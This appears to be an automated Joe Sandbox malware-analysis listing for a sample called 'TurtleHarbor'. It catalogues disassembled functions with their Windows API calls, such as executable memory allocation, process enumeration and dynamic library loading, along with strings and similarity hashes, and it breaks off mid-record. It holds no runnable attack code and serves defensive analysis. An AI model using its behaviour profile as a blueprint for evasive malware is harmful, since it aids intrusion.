Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 023e97e97e72b8f4e0e6283720365f646644c5b02e2073123fa75a9b7c022a1a
Instruction ID: f71550c57bb00b647bf1d474e9b77364e8e855dc8cf15ad1e0dc92ebff6bfc79
Opcode Fuzzy Hash: 023e97e97e72b8f4e0e6283720365f646644c5b02e2073123fa75a9b7c022a1a
Instruction Fuzzy Hash: 3221A332610219BFDF269F54CC46FEE3B69EF48714F110214FE156B1D0D6B5AC549B90

Function 003981B8 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0039826F
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0039827D
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00398284

Strings

msctls_updown32, xrefs: 003981E9

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 1659d17d13d3e880a0d9e42b3b0c458093dfabb4d269f268e1c80104c31f390a
Instruction ID: cd7e620fe2db824613b71bc09aa920e7bf84b17744bbff1946bc8f41a2e2175d
Opcode Fuzzy Hash: 1659d17d13d3e880a0d9e42b3b0c458093dfabb4d269f268e1c80104c31f390a
Instruction Fuzzy Hash: EF21B0B1604208AFDF02DF64DCC5DA737EDEB8A364B050459FA009B261CB30EC11CBA0

Function 003972D5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00397360
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00397370
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00397395

Strings

Listbox, xrefs: 0039732D

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 50a96ad4fe3abc8169c20790c354d4184f6cac109786877f2372f6b6928ec295
Instruction ID: 29739b7a9f983d0eec4bdb85d287a087ed2d1c2b7b62b43230da08fe5f65fafd
Opcode Fuzzy Hash: 50a96ad4fe3abc8169c20790c354d4184f6cac109786877f2372f6b6928ec295
Instruction Fuzzy Hash: E021BE32624118BFDF178F54DC85EFF37AAEB89764F128124F9449B1A0C671AC519BA0

Function 00397D33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00397D97
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00397DAC
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00397DB9

Strings

msctls_trackbar32, xrefs: 00397D6E

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: b132c5e406650d91dff22a5f92739f57f3c85dd8c75c7f67d53731dbfa353c1d
Instruction ID: 8e34108467b7c3cf5604ea160c78b9e3a1131727552987ad4fa1456ee5706f51
Opcode Fuzzy Hash: b132c5e406650d91dff22a5f92739f57f3c85dd8c75c7f67d53731dbfa353c1d
Instruction Fuzzy Hash: E4112372214208BEDF269F60CC05FEB77ADEF88B14F124128FA40A60E0D6719810CB20

Function 0034B4F1 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0034B544: _memset.LIBCMT ref: 0034B551

Part of subcall function 00330B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0034B520,?,?,?,0031100A), ref: 00330B79

IsDebuggerPresent.KERNEL32(?,?,?,0031100A), ref: 0034B524
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0031100A), ref: 0034B533

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0034B52E
=;, xrefs: 0034B514

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=;
API String ID: 3158253471-1169783345
Opcode ID: 655b6a286631738a4cfcd59ab26811fe6d6e0102af713b77599ad114186b63d3
Instruction ID: ee8877402b78c0faf842509ed895cf3ebb0102b35ef5213a61e975ac86e94bc0
Opcode Fuzzy Hash: 655b6a286631738a4cfcd59ab26811fe6d6e0102af713b77599ad114186b63d3
Instruction Fuzzy Hash: 5CE06D742003218BD7269F39E404782FAE4AF19708F00895DE486CAB41EBB5E544CBA1

Function 0038C6D9 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0035027A,?), ref: 0038C6E7
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0038C6F9

Strings

kernel32.dll, xrefs: 0038C6E2
GetSystemWow64DirectoryW, xrefs: 0038C6F3

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 2574300362-1816364905
Opcode ID: 813c1b0e2584fdd42327562c557470f902af4164d2617f14d27494c1254705f6
Instruction ID: 97caa6f1628e58d65d6259eb0604cd4cb09569a08b50e052d85c3e59b4c8c902
Opcode Fuzzy Hash: 813c1b0e2584fdd42327562c557470f902af4164d2617f14d27494c1254705f6
Instruction Fuzzy Hash: 35E08C381203028FD7226B25C849A82B6D8EB05384F41946DE8C5D2220D770D8408B20

Function 00391447 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00391696), ref: 00391455
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00391467

Strings

RegDeleteKeyExW, xrefs: 00391461
advapi32.dll, xrefs: 00391450

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: f75a48119c7a4e83a73f4e5aff4a5e42df3e369d11fb45f88906bd832fa5a3f6
Instruction ID: b066a86db6f0474a613265ea98980307734b052c91848cb231d873336cd867d4
Opcode Fuzzy Hash: f75a48119c7a4e83a73f4e5aff4a5e42df3e369d11fb45f88906bd832fa5a3f6
Instruction Fuzzy Hash: A3D012355107138FDB225F76C80878676E8AF06395F15C82ED4D6E2150DA70D8C0C710

Function 003255F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00325E3D), ref: 003255FE
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00325610

Strings

kernel32.dll, xrefs: 003255F9
GetNativeSystemInfo, xrefs: 0032560A

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetNativeSystemInfo$kernel32.dll
API String ID: 2574300362-192647395
Opcode ID: 89e276772502adfb5cc2b14446ab32055c6af06b3aff1766bd94ea0899e9b7f3
Instruction ID: ecdea16bea0fc3465b063ba27b6912f61153887a1a9d35fee20b7c37df2b791e
Opcode Fuzzy Hash: 89e276772502adfb5cc2b14446ab32055c6af06b3aff1766bd94ea0899e9b7f3
Instruction Fuzzy Hash: 95D05E78920B22CFE7269F31DC0879776E8EF06795F12D82ED4C6D22A1E770C880CA50

Function 003897CA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,003893DE,?,003A0980), ref: 003897D8
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003897EA

Strings

kernel32.dll, xrefs: 003897D3
GetModuleHandleExW, xrefs: 003897E4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 8a1ec32e7bcc06f9afce3214cdc38c1e4614352e5176b6dec2c5072ab40ede65
Instruction ID: 6bf05f57fbeb02d419090bf28664ba7edb696f289b03754140fa13cce8e68ac1
Opcode Fuzzy Hash: 8a1ec32e7bcc06f9afce3214cdc38c1e4614352e5176b6dec2c5072ab40ede65
Instruction Fuzzy Hash: D6D017745207138FD726AF31D889796B6E8AF06392F16C86EE4D6E2160EB70D880CB11

Function 00324B77 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00324B44,?,003249D4,?,?,003227AF,?,00000001), ref: 00324B85
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00324B97

Strings

kernel32.dll, xrefs: 00324B80
Wow64DisableWow64FsRedirection, xrefs: 00324B91

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: c86e6e2f031e9de06f5b7ce574dcdba8b7b6627c7a879b68dc374ec2319f1a61
Instruction ID: bec7e576ee5d5906035bffc3adbba41ef5872275ec9e274d7259102c858c098a
Opcode Fuzzy Hash: c86e6e2f031e9de06f5b7ce574dcdba8b7b6627c7a879b68dc374ec2319f1a61
Instruction Fuzzy Hash: 55D017745107228FD7269F31EC58B867AE8AF0A391F12882ED8C6E2560E770E880CB10

Function 00324BAA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00324AF7,?), ref: 00324BB8
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00324BCA

Strings

kernel32.dll, xrefs: 00324BB3
Wow64RevertWow64FsRedirection, xrefs: 00324BC4

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 37f48dc4edbc542a6573eb5577c089c5353e3cbc98df939154fb268d5c6a7f62
Instruction ID: 67904ce20989edff914ff0f1c0bc5dceacf6753138c29e53b0c40b5109874cf3
Opcode Fuzzy Hash: 37f48dc4edbc542a6573eb5577c089c5353e3cbc98df939154fb268d5c6a7f62
Instruction Fuzzy Hash: 7ED01774510722CFD7269F31EC48B8776E9AF06391F129C6ED8C6D2564EBB0D880CA10

Function 00367D9B Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed596abbc8dd4898dfa27382a92f74c8f7ad1bfcc4d08c42071b90afe89c7a7a
Instruction ID: e08eff95f4a29995bf68a36592b480a81f38c6dc9c0e6aa6a306cdaef778cec8
Opcode Fuzzy Hash: ed596abbc8dd4898dfa27382a92f74c8f7ad1bfcc4d08c42071b90afe89c7a7a
Instruction Fuzzy Hash: AFC18F74A04216EFCB15CF98C884EAEF7B9FF48714B618598E805EB255DB31ED81CB90

Function 0038E713 Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 0038E7A7
CharLowerBuffW.USER32(?,?), ref: 0038E7EA

Part of subcall function 0038DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0038DEAE

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0038E9EA
_memmove.LIBCMT ref: 0038E9FD

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: d08227754a3735b44d1cddf7219d36a9dc28d06152c7a23c77db626923c2e5c5
Instruction ID: 94bf2bce84c79b04de1d2845f8233e45c4966bbe0fb8d43edb4137a2f2a4abd7
Opcode Fuzzy Hash: d08227754a3735b44d1cddf7219d36a9dc28d06152c7a23c77db626923c2e5c5
Instruction Fuzzy Hash: B3C18B756083119FC716EF28C48096ABBE4FF89714F0489AEF8999B351D731E945CF82

Function 0038877D Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 003887AD
CoUninitialize.OLE32 ref: 003887B8

Part of subcall function 0039DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00388A0E,?,00000000), ref: 0039DF71

VariantInit.OLEAUT32(?), ref: 003887C3
VariantClear.OLEAUT32(?), ref: 00388A94

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: 78e9ecf40f3cee981f44aa0b2a5b45c8fb6b527557d359b1badf07f3b6cf5d02
Instruction ID: 0905e22175a64bde47ca514c4b3e94e49ba7a3a3385e5a6aa4940c96d06cfe2d
Opcode Fuzzy Hash: 78e9ecf40f3cee981f44aa0b2a5b45c8fb6b527557d359b1badf07f3b6cf5d02
Instruction Fuzzy Hash: 73A15A75204B019FDB16EF54C481B6AB7E4BF8C310F558889F9969B3A2DB34ED40CB92

Function 0036814E Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,003A3C4C,?), ref: 00368308
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,003A3C4C,?), ref: 00368320
CLSIDFromProgID.OLE32(?,?,00000000,003A0988,000000FF,?,00000000,00000800,00000000,?,003A3C4C,?), ref: 00368345
_memcmp.LIBCMT ref: 00368366

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 1ee8b346fe3952a120fd6744fae846c4c720abaf062ef67d3d20fbbb8a0906e5
Instruction ID: d669c7caeb9b5e3a65bc027619b55e7c9210d3ae1817723c4bfc553a600966e9
Opcode Fuzzy Hash: 1ee8b346fe3952a120fd6744fae846c4c720abaf062ef67d3d20fbbb8a0906e5
Instruction Fuzzy Hash: 59813975A00109EFCB05DFD4C988EEEB7B9FF89315F208558E506AB254DB71AE06CB60

Function 0036749B Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 003674AC
SysAllocString.OLEAUT32(00000000), ref: 00367555
VariantCopy.OLEAUT32 ref: 00367584
VariantClear.OLEAUT32(?), ref: 003675AB

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: f859e5aecae5195334fe2fa87b440dd64291b4c884fa5e20b51df99af6f8c485
Instruction ID: 0ad189587ee25136921ae74d32b2b69c49e92abb2be5c8742f461ce33bcaae98
Opcode Fuzzy Hash: f859e5aecae5195334fe2fa87b440dd64291b4c884fa5e20b51df99af6f8c485
Instruction Fuzzy Hash: 8F51EB30608701DBDB269F79D895A6DF3E9AF49318F70C81FE546CB6A5EB309880CB15

Function 0038F4F6 Relevance: 6.2, APIs: 4, Instructions: 164processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0038F526
Process32FirstW.KERNEL32(00000000,?), ref: 0038F534

Part of subcall function 00321A36: _memmove.LIBCMT ref: 00321A77

Process32NextW.KERNEL32(00000000,?), ref: 0038F5F4
CloseHandle.KERNEL32(00000000,?,?,?), ref: 0038F603

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
String ID:
API String ID: 2576544623-0
Opcode ID: b946783524aabd8ef77a87b5b9d71b35b05c157c16dc20260a3b5c80921b31c5
Instruction ID: b4f464e82050fed69c108733576fbba31cf43d96b7db3ee1125b2767042f4d05
Opcode Fuzzy Hash: b946783524aabd8ef77a87b5b9d71b35b05c157c16dc20260a3b5c80921b31c5
Instruction Fuzzy Hash: 1A517FB15043119FD316EF24EC85EABB7E8EF99700F00492DF595DB291EB70A944CB92

Function 00399E19 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00399E88
ScreenToClient.USER32(00000002,00000002), ref: 00399EBB
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00399F28

Memory Dump Source

Source File: 00000012.00000002.1749554741.0000000000311000.00000020.00000001.01000000.00000008.sdmp, Offset: 00310000, based on PE: true

Associated: 00000012.00000002.1749536757.0000000000310000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749594575.00000000003C6000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749631543.00000000003D0000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1749646426.00000000003D9000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_310000_TurtleHarbor.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 0a3c7685d2c76c6d531d56e81ef3ad1ec7f7037a048ccc7ed9fd46f845609938
